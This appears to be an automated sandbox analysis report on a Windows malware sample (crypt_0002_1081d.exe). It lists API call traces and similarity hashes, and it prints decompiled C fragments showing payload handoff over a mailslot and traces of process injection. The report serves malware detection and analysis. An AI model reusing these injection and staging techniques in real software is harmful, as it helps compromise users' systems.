    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 61691

General

Root Process Name:d3d8sext.exe
Process MD5:B91092360DF199385AC3DC6C3AA8A0E3
Total matches:135
Initial Analysis Report:Open
Initial sample Analysis ID:61691
Initial sample SHA 256:66E3388A2CEDA528C7697FC7B76EDA99563A2118CEC4C17B7B20D3BF08378655
Initial sample name:crypt_0002_1081d.exe

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
